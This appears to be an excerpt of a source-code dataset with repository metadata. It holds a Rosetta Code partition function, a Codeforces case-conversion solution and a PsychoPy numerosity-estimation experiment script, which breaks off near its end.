.. [Garyfallidis12] Garyfallidis E., "Towards an accurate brain tractography",
PhD thesis, University of Cambridge, 2012.
.. include:: ../links_names.inc
"""
| 25.633987 | 81 | 0.72922 | 575 | 3,922 | 4.897391 | 0.429565 | 0.019886 | 0.01598 | 0.009233 | 0.019176 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010341 | 0.161652 | 3,922 | 152 | 82 | 25.802632 | 0.846107 | 0.134625 | 0 | 0 | 0 | 0 | 0.122435 | 0.015048 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.341463 | 0 | 0.341463 | 0.02439 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
af4209c29081da3f889072766ee3f06622d6ef57 | 374 | py | Python | Task/9-billion-names-of-God-the-integer/Python/9-billion-names-of-god-the-integer-2.py | LaudateCorpus1/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | 1 | 2018-11-09T22:08:38.000Z | 2018-11-09T22:08:38.000Z | Task/9-billion-names-of-God-the-integer/Python/9-billion-names-of-god-the-integer-2.py | seanwallawalla-forks/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | null | null | null | Task/9-billion-names-of-God-the-integer/Python/9-billion-names-of-god-the-integer-2.py | seanwallawalla-forks/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | 1 | 2018-11-09T22:08:40.000Z | 2018-11-09T22:08:40.000Z | def partitions(N):
diffs,k,s = [],1,1
while k * (3*k-1) < 2*N:
diffs.extend([(2*k - 1, s), (k, s)])
k,s = k+1,-s
out = [1] + [0]*N
for p in range(0, N+1):
x = out[p]
for (o,s) in diffs:
p += o
if p > N: break
out[p] += x*s
return out
p = partitions(12345)
for x in [23,123,1234,12345]: print x, p[x]
| 19.684211 | 44 | 0.435829 | 73 | 374 | 2.232877 | 0.369863 | 0.03681 | 0.03681 | 0.04908 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129167 | 0.358289 | 374 | 18 | 45 | 20.777778 | 0.55 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af4233fc73bef13415ed0e5a7bb3cc5f4af63d98 | 659 | py | Python | Codeforce/CF59-D2-A/Word.py | Sonu589/Hacktoberfest-2025 | 06397aa12a41967cb112722666e384007d87dbc4 | [
"MIT"
] | 1 | 2021-10-04T07:14:40.000Z | 2021-10-04T07:14:40.000Z | Codeforce/CF59-D2-A/Word.py | Sonu589/Hacktoberfest-2025 | 06397aa12a41967cb112722666e384007d87dbc4 | [
"MIT"
] | 11 | 2022-01-24T20:42:11.000Z | 2022-02-27T23:58:24.000Z | Codeforce/CF59-D2-A/Word.py | Sonu589/Hacktoberfest-2025 | 06397aa12a41967cb112722666e384007d87dbc4 | [
"MIT"
] | 1 | 2021-10-05T04:40:26.000Z | 2021-10-05T04:40:26.000Z | #!/usr/bin/env python3
import sys
input = sys.stdin.readline
############ ---- Input Functions, coutery of 'thekushalghosh' ---- ############
def inp():
return(int(input()))
def inlt():
return(list(map(int, input().split())))
def insr():
s = input()
return(list(s[:len(s) - 1]))
def invr():
return(map(int, input().split()))
if __name__ == "__main__":
s = insr()
countl = 0
countu = 0
countl = sum(1 for c in s if c.islower())
countu = len(s) - countl
if countu > countl:
s = [i.upper() for i in s]
print(''.join(s))
else:
s = [i.lower() for i in s]
print(''.join(s))
| 17.810811 | 80 | 0.515933 | 92 | 659 | 3.608696 | 0.467391 | 0.072289 | 0.066265 | 0.096386 | 0.10241 | 0.10241 | 0.10241 | 0 | 0 | 0 | 0 | 0.010309 | 0.264036 | 659 | 36 | 81 | 18.305556 | 0.674227 | 0.115326 | 0 | 0.086957 | 0 | 0 | 0.014363 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.173913 | false | 0 | 0.043478 | 0.130435 | 0.217391 | 0.086957 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
af460998cc26e43cba546213ee7d2d2af0002a95 | 37,065 | py | Python | runExpPsychopy/Exp1_olderPsychopy_correctStructure0214_writeResp.py | miaoli-psy/CrowdingNumerosityGit | 625c2693fd210b936e0cf95e9ca2d35c808251b8 | [
"BSD-2-Clause"
] | null | null | null | runExpPsychopy/Exp1_olderPsychopy_correctStructure0214_writeResp.py | miaoli-psy/CrowdingNumerosityGit | 625c2693fd210b936e0cf95e9ca2d35c808251b8 | [
"BSD-2-Clause"
] | null | null | null | runExpPsychopy/Exp1_olderPsychopy_correctStructure0214_writeResp.py | miaoli-psy/CrowdingNumerosityGit | 625c2693fd210b936e0cf95e9ca2d35c808251b8 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
This experiment was created using PsychoPy2 Experiment Builder (v1.84.2),
on February 14, 2019, at 13:04
If you publish work using this script please cite the PsychoPy publications:
Peirce, JW (2007) PsychoPy - Psychophysics software in Python.
Journal of Neuroscience Methods, 162(1-2), 8-13.
Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy.
Frontiers in Neuroinformatics, 2:10. doi: 10.3389/neuro.11.010.2008
"""
#relative files (condition files and stimuli pictures, in C:\Users\MiaoLi\Desktop\SCALab\Programming\Crowding_and_numerosity\setupExp_psychopy\Psychopybuilder\Crowding\Miao_exp_lilleLab\Exp1_short_olderPsychopy)
from __future__ import absolute_import, division
from psychopy import locale_setup, gui, visual, core, data, event, logging, sound, monitors
from psychopy.constants import (NOT_STARTED, STARTED, PLAYING, PAUSED,
STOPPED, FINISHED, PRESSED, RELEASED, FOREVER)
import numpy as np # whole numpy lib is available, prepend 'np.'
from numpy import (sin, cos, tan, log, log10, pi, average,
sqrt, std, deg2rad, rad2deg, linspace, asarray)
from numpy.random import random, randint, normal, shuffle
import os # handy system and path functions
import sys # to get file system encoding
# Ensure that relative paths start from the same directory as this script
_thisDir = os.path.dirname(os.path.abspath(__file__)).decode(sys.getfilesystemencoding())
os.chdir(_thisDir)
# Store info about the experiment session
expName = 'Crwdng_Nmrsty_older_runOnLab1' # from the Builder filename that created this script
expInfo = {u'handedness': ['Right handed', 'Left handed'],
u'participant': u'',
u'age': u'',
u'blockOrder': u'',
u'sex': ['Female','Male'],
u'group': ['1','2']}
dlg = gui.DlgFromDict(dictionary=expInfo, title=expName)
if dlg.OK == False:
core.quit() # user pressed cancel
expInfo['date'] = data.getDateStr() # add a simple timestamp
expInfo['expName'] = expName
# Data file name stem = absolute path + name; later add .psyexp, .csv, .log, etc
filename = _thisDir + os.sep + u'data_Crwdng_Nmrsty1/group_%s_participant_%s_date_%s' % (expInfo['group'], expInfo['participant'], expInfo['date'])
# An ExperimentHandler isn't essential but helps with data saving
thisExp = data.ExperimentHandler(name=expName, version='',
extraInfo=expInfo, runtimeInfo=None,
originPath=None,
savePickle=True, saveWideText=True,
dataFileName=filename)
# save a log file for detail verbose info
logFile = logging.LogFile(filename+'.log', level=logging.EXP)
logging.console.setLevel(logging.WARNING) # this outputs to the screen, not a file
endExpNow = False # flag for 'escape' or other condition => quit the exp
# Start Code - component code to be run before the window creation
# Setup the Window
#win = visual.Window(
# size=(1024, 768), fullscr=True, screen=0,
# allowGUI=False, allowStencil=False,
# monitor='testMonitor', color=[0,0,0], colorSpace='rgb',
# blendMode='avg', useFBO=True)
myMonitor= monitors.Monitor('CRT_Lille', width = 57, distance = 40.5)#TODO
myMonitor.setSizePix([1024, 768])
win = visual.Window(monitor=myMonitor,
size = [1024, 768],
screen =1,
units='pix',
fullscr = False,
allowGUI = False,
winType = 'pyglet',
color = (0,0,0))
# store frame rate of monitor if we can measure it
expInfo['frameRate'] = win.getActualFrameRate()
if expInfo['frameRate'] != None:
frameDur = 1.0 / round(expInfo['frameRate'])
else:
frameDur = 1.0 / 100.0 # could not measure, so guess
#print(expInfo['frameRate'])
# Initialize components for Routine "instr1"
instr1Clock = core.Clock()
# Initialize components for Routine "fixation"
fixationClock = core.Clock()
# Initialize components for Routine "practice"
practiceClock = core.Clock()
p_img = visual.ImageStim(
win=win, name='p_img',
image='sin', mask=None,
ori=0, pos=(0, 0), size=None,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
# Initialize components for Routine "endP"
endPClock = core.Clock()
# Initialize components for Routine "instr2"
instr2Clock = core.Clock()
# Initialize components for Routine "fixation"
fixationClock = core.Clock()
# Initialize components for Routine "trial"
trialClock = core.Clock()
image = visual.ImageStim(
win=win, name='image',
image='sin', mask=None,
ori=0, pos=(0, 0), size=None,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
# Initialize components for Routine "break_3"
break_3Clock = core.Clock()
# Initialize components for Routine "thanks"
thanksClock = core.Clock()
# Create some handy timers
globalClock = core.Clock() # to track the time since experiment started
routineTimer = core.CountdownTimer() # to track time remaining of each (non-slip) routine
# ------Prepare to start Routine "instr1"-------
t = 0
instr1Clock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
# keep track of which components have finished
instr1Components = []
for thisComponent in instr1Components:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "instr1"-------
while continueRoutine:
# get current time
t = instr1Clock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
message1 = visual.TextStim(win, pos=[0,+30],units = 'pix')
message1.setText('Welcome to our experiment.')
message2 = visual.TextStim(win, pos=[0, 0],units = 'pix')
message2.setText('Please give your best esimation.')
message3 = visual.TextStim(win, pos=[0, -30], units = 'pix')
message3.setText('Hit spacebar to start practice.')
message1.draw()
message2.draw()
message3.draw()
win.flip()
event.waitKeys(keyList = ['space'])
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in instr1Components:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "instr1"-------
for thisComponent in instr1Components:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# the Routine "instr1" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# set up handler to look after randomisation of conditions etc
p_trials = data.TrialHandler(nReps=5, method='random',
extraInfo=expInfo, originPath=-1,
trialList=[None],
seed=None, name='p_trials')
thisExp.addLoop(p_trials) # add the loop to the experiment
thisP_trial = p_trials.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisP_trial.rgb)
if thisP_trial != None:
for paramName in thisP_trial.keys():
exec(paramName + '= thisP_trial.' + paramName)
for thisP_trial in p_trials:
currentLoop = p_trials
# abbreviate parameter names if possible (e.g. rgb = thisP_trial.rgb)
if thisP_trial != None:
for paramName in thisP_trial.keys():
exec(paramName + '= thisP_trial.' + paramName)
# ------Prepare to start Routine "fixation"-------
t = 0
fixationClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
# keep track of which components have finished
fixationComponents = []
for thisComponent in fixationComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "fixation"-------
while continueRoutine:
# get current time
t = fixationClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
fixation = visual.TextStim(win, color = (-1, -1, -1), bold = True, units = 'pix')
fixation.setText('+')
fixation.draw()
win.flip()
event.waitKeys(keyList = ['space'])
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in fixationComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "fixation"-------
for thisComponent in fixationComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# the Routine "fixation" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# ------Prepare to start Routine "practice"-------
t = 0
practiceClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
p_img.setImage(u'2_c_2_f_100_wS_0.4_eS_0.15811388300841897_0.15811388300841897_33.png')
key_resp_2 = event.BuilderKeyResponse()
# keep track of which components have finished
practiceComponents = [p_img, key_resp_2]
for thisComponent in practiceComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "practice"-------
while continueRoutine:
# get current time
t = practiceClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *p_img* updates
if t >= 0.0 and p_img.status == NOT_STARTED:
# keep track of start time/frame for later
p_img.tStart = t
p_img.frameNStart = frameN # exact frame index
p_img.setAutoDraw(True)
frameRemains = 0.0 + 0.15- win.monitorFramePeriod * 0.75 # most of one frame period left
if p_img.status == STARTED and t >= frameRemains:
p_img.setAutoDraw(False)
# *key_resp_2* updates
if t >= 0.15 and key_resp_2.status == NOT_STARTED:
# keep track of start time/frame for later
key_resp_2.tStart = t
key_resp_2.frameNStart = frameN # exact frame index
key_resp_2.status = STARTED
# keyboard checking is just starting
win.callOnFlip(key_resp_2.clock.reset) # t=0 on next screen flip
event.clearEvents(eventType='keyboard')
if key_resp_2.status == STARTED:
# theseKeys = event.getKeys()
ptext = visual.TextStim(win, pos = [0, 0])
# theseKeys = event.getKeys(keyList=['y', 'n', 'left', 'right', 'space'])
theseKeysP = event.getKeys(keyList=['1','2','3','4','5','6','7','8','9','0','return', 'backspace','num_1','num_2','num_3','num_4','num_5','num_6','num_7','num_8','num_9','num_0'])
# check for quit:
if "escape" in theseKeysP:
endExpNow = True
if len(theseKeysP) > 0: # at least one key was pressed
if "backspace" in theseKeysP:
key_resp_2.keys=key_resp_2.keys[:-1]
key_resp_2.keys.extend([key for key in theseKeysP if key != "return" and key != "backspace"])
for n, i in enumerate(key_resp_2.keys):
if i =='num_1':
key_resp_2.keys[n] = '1'
elif i =='num_2':
key_resp_2.keys[n] = '2'
elif i =='num_3':
key_resp_2.keys[n] = '3'
elif i =='num_4':
key_resp_2.keys[n] = '4'
elif i =='num_5':
key_resp_2.keys[n] = '5'
elif i =='num_6':
key_resp_2.keys[n] = '6'
elif i =='num_7':
key_resp_2.keys[n] = '7'
elif i =='num_8':
key_resp_2.keys[n] = '8'
elif i =='num_9':
key_resp_2.keys[n] = '9'
elif i =='num_0':
key_resp_2.keys[n] = '0'
# Atext.setText("".join(key_resp_3.keys))
# convert the list of strings into a single string
key_str2 = "".join(key_resp_2.keys)
ptext.setText(key_str2)
ptext.draw()
win.flip()
# # event.waitKeys(5,keyList = ['return'])
core.wait(0.5)
if len(key_str2) !=0:
# then convert the string to a number
key_num2 = int(key_str2)
if "return" in theseKeysP:
# ptext.setText('')
# ptext.draw()
# win.flip()
# core.wait(0.5)
continueRoutine=False
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in practiceComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "practice"-------
for thisComponent in practiceComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# check responses
if key_resp_2.keys in ['', [], None]: # No response was made
key_resp_2.keys=None
p_trials.addData('key_resp_2.keys',key_resp_2.keys)
if key_resp_2.keys != None: # we had a response
p_trials.addData('key_resp_2.rt', key_resp_2.rt)
# the Routine "practice" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
thisExp.nextEntry()
# completed 5 repeats of 'p_trials'
# ------Prepare to start Routine "endP"-------
t = 0
endPClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
# keep track of which components have finished
endPComponents = []
for thisComponent in endPComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "endP"-------
while continueRoutine:
# get current time
t = endPClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
end_practice1 = visual.TextStim(win, pos=[0,+35],units = 'pix')
end_practice1.setText('This is the end of practice')
end_practice2 = visual.TextStim(win, pos=[0, 0], units = 'pix')
end_practice2.setText('There are 10 blocks of the real experiment, you will see 3 reference images before each block.')
end_practice3 = visual.TextStim(win, pos=[0, -35], units = 'pix')
end_practice3.setText('Hit spacebar to start the real experiment.')
end_practice1.draw()
end_practice2.draw()
end_practice3.draw()
win.flip()
event.waitKeys(keyList = ['space'])
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in endPComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "endP"-------
for thisComponent in endPComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# the Routine "endP" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# set up handler to look after randomisation of conditions etc
blocks = data.TrialHandler(nReps=1, method='sequential',
extraInfo=expInfo, originPath=-1,
trialList=data.importConditions("blockOrder"+expInfo['blockOrder']+".csv"),
seed=None, name='blocks')
thisExp.addLoop(blocks) # add the loop to the experiment
thisBlock = blocks.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisBlock.rgb)
if thisBlock != None:
for paramName in thisBlock.keys():
exec(paramName + '= thisBlock.' + paramName)
for thisBlock in blocks:
currentLoop = blocks
# abbreviate parameter names if possible (e.g. rgb = thisBlock.rgb)
if thisBlock != None:
for paramName in thisBlock.keys():
exec(paramName + '= thisBlock.' + paramName)
# ------Prepare to start Routine "instr2"-------
t = 0
instr2Clock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
# keep track of which components have finished
instr2Components = []
for thisComponent in instr2Components:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "instr2"-------
while continueRoutine:
# get current time
t = instr2Clock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
fix = visual.TextStim(win, pos = [0, 0], bold = True, units = 'pix')
block_text = visual.TextStim(win, pos=[0, 0], units = 'pix')
block_text.setText('Fixate to the center of screen and press spacebar to see the reference display.')
block_text.draw()
win.flip()
event.waitKeys(keyList = ['space'])
fix.setText('+')
fix.setColor(u'black')
fix.draw()
win.flip()
event.waitKeys(keyList = ['space'])
image_ref = visual.ImageStim(win, image = ref_image1, units = 'pix')
image_ref.draw()
win.flip()
core.wait(0.15)
image_ref_text = visual.TextStim(win, pos=[0, 15], units ='pix')
image_ref_text2 = visual.TextStim(win, pos=[0, -15], units = 'pix')
image_ref_text3 = visual.TextStim(win, pos=[0, 0], units = 'pix')
image_ref_text.setText('The number of the reference disks is %s:' %(int(Number1)))
image_ref_text2.setText('Press C to continue')
image_ref_text.draw()
image_ref_text2.draw()
win.flip()
event.waitKeys(keyList = ['c'])
# image_ref_text2.setText(Number1)
image_ref_text3.setText('Fixate to the center and press spacebar to see another reference display.')
# image_ref_text.draw()
# image_ref_text2.draw()
image_ref_text3.draw()
win.flip()
event.waitKeys(keyList = ['space'])
# block_text.setText('+')
# block_text.setColor(u'black')
# block_text.draw()
fix.draw()
win.flip()
event.waitKeys(keyList = ['space'])
image_ref2 = visual.ImageStim(win, image = ref_image2, units = 'pix')
image_ref.draw()
win.flip()
core.wait(0.15)
image_ref_text.setText('The number of the reference disks is %s:' %(int(Number2)))
# image_ref_text2.setText(Number2)
# image_ref_text2.setText('Press spacebar to continue')
image_ref_text.draw()
image_ref_text2.draw()
win.flip()
event.waitKeys(keyList = ['c'])
image_ref_text3.draw()
win.flip()
event.waitKeys(keyList = ['space'])
fix.draw()
win.flip()
event.waitKeys(keyList = ['space'])
image_ref3 = visual.ImageStim(win, image = ref_image3, units = 'pix')
image_ref3.draw()
win.flip()
core.wait(0.15)
image_ref_text.setText('The number of the reference disks is %s:' %(int(Number3)))
image_ref_text.draw()
image_ref_text2.draw()
win.flip()
event.waitKeys(keyList = ['c'])
image_ref_text3.setText('Press spacebar to start the real experiment.')
image_ref_text3.draw()
win.flip()
event.waitKeys(keyList = ['space'])
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in instr2Components:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "instr2"-------
for thisComponent in instr2Components:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# the Routine "instr2" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# set up handler to look after randomisation of conditions etc
trials = data.TrialHandler(nReps=1, method='random',
extraInfo=expInfo, originPath=-1,
trialList=data.importConditions(winsize),
seed=None, name='trials')
thisExp.addLoop(trials) # add the loop to the experiment
thisTrial = trials.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisTrial.rgb)
if thisTrial != None:
for paramName in thisTrial.keys():
exec(paramName + '= thisTrial.' + paramName)
for thisTrial in trials:
currentLoop = trials
# abbreviate parameter names if possible (e.g. rgb = thisTrial.rgb)
if thisTrial != None:
for paramName in thisTrial.keys():
exec(paramName + '= thisTrial.' + paramName)
# ------Prepare to start Routine "fixation"-------
t = 0
fixationClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
# keep track of which components have finished
fixationComponents = []
for thisComponent in fixationComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "fixation"-------
while continueRoutine:
# get current time
t = fixationClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
fixation = visual.TextStim(win, color = (-1, -1, -1), bold = True, units = 'pix')
fixation.setText('+')
fixation.draw()
win.flip()
event.waitKeys(keyList = ['space'])
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in fixationComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "fixation"-------
for thisComponent in fixationComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# the Routine "fixation" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# ------Prepare to start Routine "trial"-------
t = 0
trialClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
image.setImage(imageFile)
key_resp_3 = event.BuilderKeyResponse()
# keep track of which components have finished
trialComponents = [image, key_resp_3]
for thisComponent in trialComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "trial"-------
while continueRoutine:
# get current time
t = trialClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *image* updates
if t >= 0.0 and image.status == NOT_STARTED:
# keep track of start time/frame for later
image.tStart = t
image.frameNStart = frameN # exact frame index
image.setAutoDraw(True)
frameRemains = 0.0 + 0.15- win.monitorFramePeriod * 0.75 # most of one frame period left
if image.status == STARTED and t >= frameRemains:
image.setAutoDraw(False)
# *key_resp_3* updates
if t >= 0.15 and key_resp_3.status == NOT_STARTED:
# keep track of start time/frame for later
key_resp_3.tStart = t
key_resp_3.frameNStart = frameN # exact frame index
key_resp_3.status = STARTED
# keyboard checking is just starting
win.callOnFlip(key_resp_3.clock.reset) # t=0 on next screen flip
event.clearEvents(eventType='keyboard')
if key_resp_3.status == STARTED:
# theseKeys = event.getKeys()
Atext=visual.TextStim(win)
theseKeys = event.getKeys(keyList=['1','2','3','4','5','6','7','8','9','0','return', 'backspace','num_1','num_2','num_3','num_4','num_5','num_6','num_7','num_8','num_9','num_0'])
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
if "backspace" in theseKeys:
key_resp_3.keys=key_resp_3.keys[:-1]
#key_resp_3.rt = key_resp_3.clock.getTime()
key_resp_3.keys.extend([key for key in theseKeys if key != "return" and key != "backspace"])
for n, i in enumerate(key_resp_3.keys):
if i =='num_1':
key_resp_3.keys[n] = '1'
elif i =='num_2':
key_resp_3.keys[n] = '2'
elif i =='num_3':
key_resp_3.keys[n] = '3'
elif i =='num_4':
key_resp_3.keys[n] = '4'
elif i =='num_5':
key_resp_3.keys[n] = '5'
elif i =='num_6':
key_resp_3.keys[n] = '6'
elif i =='num_7':
key_resp_3.keys[n] = '7'
elif i =='num_8':
key_resp_3.keys[n] = '8'
elif i =='num_9':
key_resp_3.keys[n] = '9'
elif i =='num_0':
key_resp_3.keys[n] = '0'
# Atext.setText("".join(key_resp_3.keys))
# convert the list of strings into a single string
key_str = "".join(key_resp_3.keys)
Atext.setText(key_str)
Atext.draw()
win.flip()
# # event.waitKeys(5,keyList = ['return'])
core.wait(0.5)
if len(key_str) !=0:
# then convert the string to a number
key_num = int(key_str)
if "return" in theseKeys:
key_resp_3.rt = key_resp_3.clock.getTime()
Atext.setText('')
Atext.draw()
core.wait(0.5)
continueRoutine=False
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in trialComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "trial"-------
for thisComponent in trialComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# check responses
if key_resp_3.keys in ['', [], None]: # No response was made
key_resp_3.keys=None
trials.addData('key_resp_3.keys',key_num)
if key_resp_3.keys != None: # we had a response
trials.addData('key_resp_3.rt', key_resp_3.rt)
# the Routine "trial" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# ------Prepare to start Routine "break_3"-------
t = 0
break_3Clock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
if trials.thisN != 24: #TODO
continueRoutine = False
# keep track of which components have finished
break_3Components = []
for thisComponent in break_3Components:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "break_3"-------
while continueRoutine:
# get current time
t = break_3Clock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
break_text2 = visual.TextStim(win, text = 'Take a short break. Press spacebar to continue.', pos=[0, 0],units = 'pix')
break_text2.draw()
win.flip()
event.waitKeys(keyList = ['space'])
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in break_3Components:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "break_3"-------
for thisComponent in break_3Components:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# the Routine "break_3" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
thisExp.nextEntry()
# completed 1 repeats of 'trials'
thisExp.nextEntry()
# completed 1 repeats of 'blocks'
# ------Prepare to start Routine "thanks"-------
t = 0
thanksClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
# keep track of which components have finished
thanksComponents = []
for thisComponent in thanksComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
